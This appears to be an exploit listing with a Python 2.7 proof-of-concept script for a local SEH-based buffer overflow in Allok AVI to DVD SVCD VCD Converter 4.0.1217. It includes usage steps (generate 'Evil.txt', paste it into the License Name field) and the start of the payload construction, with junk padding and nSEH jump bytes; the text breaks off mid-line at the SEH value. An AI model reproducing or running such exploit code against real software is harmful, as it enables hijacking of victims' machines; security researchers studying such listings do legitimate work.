####################################################### # Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH) # Date: 25.04.2018 # Exploit Author:T3jv1l # Vendor Homepage:http://www.alloksoft.com/ # Software: www.alloksoft.com/allok_avi2dvd.exe # Category:Local # Contact:https://twitter.com/T3jv1l # Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217 # Tested on: Windows 7 SP1 x86 # Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ ############################################################# print""" #1. Download and install the setup file #2. Run this exploit code via python 2.7 #3. A file "Evil.txt" will be created #4. Copy the contents of the file (Evil.txt)and paste in the License Name field #5. Click Register and BOMM !!!! """ import struct junk = "A" * 780 nseh = "\x90\x90\xeb\x10" seh = struct.pack("